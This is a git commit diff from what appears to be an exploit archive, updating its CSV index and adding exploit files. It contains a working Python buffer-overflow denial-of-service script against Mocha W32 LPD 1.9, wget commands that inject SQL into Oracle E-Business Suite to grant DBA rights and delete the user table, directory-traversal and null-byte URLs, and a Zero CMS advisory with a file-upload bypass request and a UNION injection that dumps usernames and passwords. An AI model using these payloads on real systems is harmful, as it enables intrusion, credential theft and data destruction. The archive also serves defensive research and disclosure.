Updated 06_24_2014
This commit is contained in:
parent
603267f643
commit
8df8a23f16
6 changed files with 168 additions and 65 deletions
|
@ -4504,7 +4504,7 @@ id,file,description,date,author,platform,type,port
|
||||||
4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability",2008-01-07,Houssamix,php,webapps,0
|
4861,platforms/php/webapps/4861.txt,"TUTOS 1.3 (cmd.php) Remote Command Execution Vulnerability",2008-01-07,Houssamix,php,webapps,0
|
||||||
4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0
|
4862,platforms/linux/remote/4862.py,"ClamAV 0.91.2 libclamav MEW PE Buffer Overflow Exploit",2008-01-07,"Thomas Pollet",linux,remote,0
|
||||||
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0
|
4863,platforms/php/webapps/4863.pl,"SmallNuke 2.0.4 Pass Recovery Remote SQL Injection Exploit",2008-01-08,"Eugene Minaev",php,webapps,0
|
||||||
4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
|
4864,platforms/php/webapps/4864.txt,"Zero CMS 1.0 - Alpha Arbitrary File Upload / SQL Injection Vulnerabilities",2008-01-08,KiNgOfThEwOrLd,php,webapps,0
|
||||||
4865,platforms/php/webapps/4865.txt,"evilboard 0.1a (sql/xss) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
|
4865,platforms/php/webapps/4865.txt,"evilboard 0.1a (sql/xss) Multiple Vulnerabilities",2008-01-08,seaofglass,php,webapps,0
|
||||||
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
|
4866,platforms/windows/remote/4866.py,"Microsoft DirectX SAMI File Parsing Remote Stack Overflow Exploit",2008-01-08,ryujin,windows,remote,0
|
||||||
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0
|
4867,platforms/php/webapps/4867.pl,"PHP Webquest 2.6 (id_actividad) Remote SQL Injection Exploit",2008-01-08,ka0x,php,webapps,0
|
||||||
|
@ -30359,7 +30359,7 @@ id,file,description,date,author,platform,type,port
|
||||||
33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80
|
33697,platforms/php/webapps/33697.txt,"eFront 3.6.14.4 (surname param) - Persistent XSS Vulnerability",2014-06-09,"shyamkumar somana",php,webapps,80
|
||||||
33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
|
33699,platforms/php/webapps/33699.txt,"WebTitan 4.01 (Build 68) - Multiple Vulnerabilities",2014-06-09,"SEC Consult",php,webapps,80
|
||||||
33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
|
33700,platforms/asp/webapps/33700.txt,"DevExpress ASPxFileManager 10.2 to 13.2.8 - Directory Traversal",2014-06-09,"RedTeam Pentesting",asp,webapps,80
|
||||||
33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) - SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
|
33702,platforms/php/webapps/33702.txt,"ZeroCMS 1.0 - (zero_view_article.php, article_id param) SQL Injection Vulnerability",2014-06-10,LiquidWorm,php,webapps,80
|
||||||
33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0
|
33704,platforms/asp/webapps/33704.txt,"BBSXP 2008 'ShowPost.asp' Cross-Site Scripting Vulnerability",2010-03-04,Liscker,asp,webapps,0
|
||||||
33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
|
33705,platforms/windows/remote/33705.txt,"Authentium Command On Demand ActiveX Control - Multiple Buffer Overflow Vulnerabilities",2010-03-04,"Nikolas Sotiriu",windows,remote,0
|
||||||
33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
|
33706,platforms/php/webapps/33706.txt,"Drupal Prior to 6.16 and 5.22 Multiple Security Vulnerabilities",2010-03-04,"David Rothstein",php,webapps,0
|
||||||
|
@ -30481,3 +30481,7 @@ id,file,description,date,author,platform,type,port
|
||||||
33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
|
33833,platforms/php/webapps/33833.txt,"Blog System 1.x Multiple Input Validation Vulnerabilities",2010-04-12,"cp77fk4r ",php,webapps,0
|
||||||
33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
|
33834,platforms/php/webapps/33834.txt,"Vana CMS 'filename' Parameter Remote File Download Vulnerability",2010-04-13,"Pouya Daneshmand",php,webapps,0
|
||||||
33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
|
33835,platforms/php/webapps/33835.txt,"AneCMS 1.0 Multiple Local File Include Vulnerabilities",2010-04-12,"AmnPardaz Security Research Team",php,webapps,0
|
||||||
|
33838,platforms/windows/dos/33838.py,"Mocha W32 LPD 1.9 Remote Buffer Overflow Vulnerability",2010-04-15,mr_me,windows,dos,0
|
||||||
|
33839,platforms/multiple/remote/33839.txt,"Oracle E-Business Suite Financials 12 'jtfwcpnt.jsp' SQL Injection Vulnerability",2010-04-15,"Joxean Koret",multiple,remote,0
|
||||||
|
33840,platforms/asp/webapps/33840.txt,"Ziggurrat Farsi CMS 'bck' Parameter Directory Traversal Vulnerability",2010-04-15,"Pouya Daneshmand",asp,webapps,0
|
||||||
|
33841,platforms/windows/remote/33841.txt,"HTTP File Server 2.2 Security Bypass and Denial of Service Vulnerabilities",2010-04-19,"Luigi Auriemma",windows,remote,0
|
||||||
|
|
Can't render this file because it is too large.
|
7
platforms/asp/webapps/33840.txt
Executable file
7
platforms/asp/webapps/33840.txt
Executable file
|
@ -0,0 +1,7 @@
|
||||||
|
source: http://www.securityfocus.com/bid/39534/info
|
||||||
|
|
||||||
|
Ziggurat Farsi CMS is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
|
||||||
|
|
||||||
|
Exploiting this issue will allow an attacker to view arbitrary files within the context of the application. Information harvested may aid in launching further attacks.
|
||||||
|
|
||||||
|
http://www.example.com/manager/backup.asp?bck=./../file.asp
|
11
platforms/multiple/remote/33839.txt
Executable file
11
platforms/multiple/remote/33839.txt
Executable file
|
@ -0,0 +1,11 @@
|
||||||
|
source: http://www.securityfocus.com/bid/39510/info
|
||||||
|
|
||||||
|
Oracle E-Business Suite Financials is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
|
||||||
|
|
||||||
|
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
|
||||||
|
|
||||||
|
Oracle E-Business Suite 12 is vulnerable; other versions may be affected.
|
||||||
|
|
||||||
|
$ export TARGET=â?<3F>http://www.example.com:<port>/OA_HTMLâ?<3F>
|
||||||
|
$ wget -O - â??$TARGET/OA.jspâ?<3F> "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'grant%20dba%20to%20mom';%20end;â?<3F>
|
||||||
|
$ wget -O - â??$TARGET/OA.jspâ?<3F> "$TARGET/jtfwcpnt.jsp?query=begin%20execute%20immediate%20'delete%20from%20apps.fnd_user';%20commit;end;â?<3F>
|
|
@ -1,63 +1,63 @@
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| ____ __________ __ ____ __ |
|
| ____ __________ __ ____ __ |
|
||||||
| /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ |
|
| /_ | ____ |__\_____ \ _____/ |_ /_ |/ |_ |
|
||||||
| | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ |
|
| | |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\ |
|
||||||
| | | | \ | |/ \ \___| | /_____/ | || | |
|
| | | | \ | |/ \ \___| | /_____/ | || | |
|
||||||
| |___|___| /\__| /______ /\___ >__| |___||__| |
|
| |___|___| /\__| /______ /\___ >__| |___||__| |
|
||||||
| \/\______| \/ \/ |
|
| \/\______| \/ \/ |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| Zero CMS Remote Arbitrary File Upload / SQL Injections |
|
| Zero CMS Remote Arbitrary File Upload / SQL Injections |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| Version: <= 1.0 Alpha (Last) |
|
| Version: <= 1.0 Alpha (Last) |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| Vendor: www.zero-cms.com |
|
| Vendor: www.zero-cms.com |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| Discovered by: KiNgOfThEwOrLd |
|
| Discovered by: KiNgOfThEwOrLd |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| Intro: |
|
| Intro: |
|
||||||
| |
|
| |
|
||||||
| An attacker can bypass the avatar upload extension filter editing |
|
| An attacker can bypass the avatar upload extension filter editing |
|
||||||
| the contenet type propriety |
|
| the contenet type propriety |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| Exploit: |
|
| Exploit: |
|
||||||
| |
|
| |
|
||||||
| Submit to index.php?act=usercp&action=avatar a request like this: |
|
| Submit to index.php?act=usercp&action=avatar a request like this: |
|
||||||
| |
|
| |
|
||||||
| -----------------------------4629606643545053171986629955\r\n |
|
| -----------------------------4629606643545053171986629955\r\n |
|
||||||
| Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n |
|
| Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n |
|
||||||
| \r\n |
|
| \r\n |
|
||||||
| 20000\r\n |
|
| 20000\r\n |
|
||||||
| -----------------------------4629606643545053171986629955\r\n |
|
| -----------------------------4629606643545053171986629955\r\n |
|
||||||
| Content-Disposition: form-data; name="avupload"; filename=" |
|
| Content-Disposition: form-data; name="avupload"; filename=" |
|
||||||
| [FILENAME].[EVIL_EXTENSION]"\r\n |
|
| [FILENAME].[EVIL_EXTENSION]"\r\n |
|
||||||
| Content-Type: image/jpeg\r\n |
|
| Content-Type: image/jpeg\r\n |
|
||||||
| \r\n |
|
| \r\n |
|
||||||
| [EVIL_CODE]\n |
|
| [EVIL_CODE]\n |
|
||||||
| \r\n |
|
| \r\n |
|
||||||
| -----------------------------4629606643545053171986629955\r\n |
|
| -----------------------------4629606643545053171986629955\r\n |
|
||||||
| Content-Disposition: form-data; name="submit"\r\n |
|
| Content-Disposition: form-data; name="submit"\r\n |
|
||||||
| \r\n |
|
| \r\n |
|
||||||
| Upload\r\n |
|
| Upload\r\n |
|
||||||
| -----------------------------4629606643545053171986629955-\r\n|
|
| -----------------------------4629606643545053171986629955-\r\n|
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| SQL Injections: |
|
| SQL Injections: |
|
||||||
| |
|
| |
|
||||||
| The most of the variable related with the database are not properly|
|
| The most of the variable related with the database are not properly|
|
||||||
| checked. Then, we get a lots of possible sql injections. |
|
| checked. Then, we get a lots of possible sql injections. |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| Some Examples: |
|
| Some Examples: |
|
||||||
| |
|
| |
|
||||||
| index.php?act=poll&mode=view&id=%27 |
|
| index.php?act=poll&mode=view&id=%27 |
|
||||||
| forums/index.php?f=%27 |
|
| forums/index.php?f=%27 |
|
||||||
| forums/index.php?t=%27 |
|
| forums/index.php?t=%27 |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| An Exploit Example: |
|
| An Exploit Example: |
|
||||||
| |
|
| |
|
||||||
| index.php?act=poll&mode=view&id=9999+union+all+select+1,username, |
|
| index.php?act=poll&mode=view&id=9999+union+all+select+1,username, |
|
||||||
| password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members |
|
| password,email,5,6,7,8,9,10,11,12,13,14+from+zc_members |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
| Surelly there are other not filtred vars, but i don't feel like to |
|
| Surelly there are other not filtred vars, but i don't feel like to |
|
||||||
| check, if u want u can find that yourself, dont you? :P |
|
| check, if u want u can find that yourself, dont you? :P |
|
||||||
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
[*]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[*]
|
||||||
|
|
||||||
# milw0rm.com [2008-01-08]
|
# milw0rm.com [2008-01-08]
|
||||||
|
|
73
platforms/windows/dos/33838.py
Executable file
73
platforms/windows/dos/33838.py
Executable file
|
@ -0,0 +1,73 @@
|
||||||
|
source: http://www.securityfocus.com/bid/39498/info
|
||||||
|
|
||||||
|
Mocha W32 LPD is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
|
||||||
|
|
||||||
|
Successful exploits may allow attackers to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
|
||||||
|
|
||||||
|
This issue affects W32 LPD 1.9; other versions may be vulnerable as well.
|
||||||
|
|
||||||
|
#!/usr/bin/python
|
||||||
|
# #################################################################
|
||||||
|
# Mocha LPD v1.9 Remote Buffer Overflow DoS PoC
|
||||||
|
# Author: mr_me
|
||||||
|
# Software Link: http://mochasoft.dk/lpd.htm
|
||||||
|
# Version: 1.9
|
||||||
|
# Tested on: Windows XP SP3
|
||||||
|
# Advisory: http://www.corelan.be:8800/advisories.php?id=10-023
|
||||||
|
# Greetz to: Corelan Security Team
|
||||||
|
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
|
||||||
|
# ##################################################################
|
||||||
|
# Script provided 'as is', without any warranty.
|
||||||
|
# Use for educational purposes only.
|
||||||
|
# Do not use this code to do anything illegal !
|
||||||
|
# Corelan does not want anyone to use this script
|
||||||
|
# for malicious and/or illegal purposes.
|
||||||
|
# Corelan cannot be held responsible for any illegal use.
|
||||||
|
#
|
||||||
|
# Note : you are not allowed to edit/modify this code.
|
||||||
|
# If you do, Corelan cannot be held responsible for any damages.
|
||||||
|
# ##################################################################
|
||||||
|
# Access violation here:
|
||||||
|
# MOV ECX,DWORD PTR DS:[EBX]
|
||||||
|
#
|
||||||
|
# The registers:
|
||||||
|
# EAX 00A2F978 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
|
||||||
|
# ECX 00006161
|
||||||
|
# EDX 00A20168
|
||||||
|
# EBX 61616161
|
||||||
|
# ESP 0012F4B8
|
||||||
|
# EBP 0012F6D4
|
||||||
|
# ESI 00A2F970 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
|
||||||
|
# EDI 61616161
|
||||||
|
# EIP 7C91AB8E ntdll.7C91AB8E
|
||||||
|
|
||||||
|
import sys, socket
|
||||||
|
|
||||||
|
print "********************************************************"
|
||||||
|
print " Mocha LPD Buffer Overflow DoS"
|
||||||
|
print " by mr_me"
|
||||||
|
print " http://net-ninja.net/ - mr_me(AT)corelan.be"
|
||||||
|
print "********************************************************"
|
||||||
|
|
||||||
|
if len(sys.argv) < 3:
|
||||||
|
print "Usage: " + sys.argv[0] + " <target ip> <port>"
|
||||||
|
sys.exit(0)
|
||||||
|
|
||||||
|
exploit = '\x05\x64\x65\x66\x61\x75\x6c\x74\x20'
|
||||||
|
exploit = '\x41' * 1500
|
||||||
|
exploit += '\x20\x61\x6c\x6c\x0a'
|
||||||
|
|
||||||
|
host = sys.argv[1]
|
||||||
|
port = int(sys.argv[2])
|
||||||
|
|
||||||
|
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||||
|
try:
|
||||||
|
connect = s.connect((host,port))
|
||||||
|
except:
|
||||||
|
print "[-] Cant connect!"
|
||||||
|
|
||||||
|
s.send("\x02")
|
||||||
|
print "[+] Sending evil payload.. ph33r o.O"
|
||||||
|
s.send(exploit)
|
||||||
|
print '[+] Server DoSed!'
|
||||||
|
s.close()
|
8
platforms/windows/remote/33841.txt
Executable file
8
platforms/windows/remote/33841.txt
Executable file
|
@ -0,0 +1,8 @@
|
||||||
|
source: http://www.securityfocus.com/bid/39544/info
|
||||||
|
|
||||||
|
HTTP File Server is prone to multiple vulnerabilities including a security-bypass issue and a denial-of-service issue.
|
||||||
|
|
||||||
|
Exploiting these issues will allow an attacker to download files from restricted directories within the context of the application or cause denial-of-service conditions.
|
||||||
|
|
||||||
|
http://www.example.com/protected_folder/secret_file.txt%00
|
||||||
|
http://www.example.com/?search=%25%25
|
Loading…
Add table
Reference in a new issue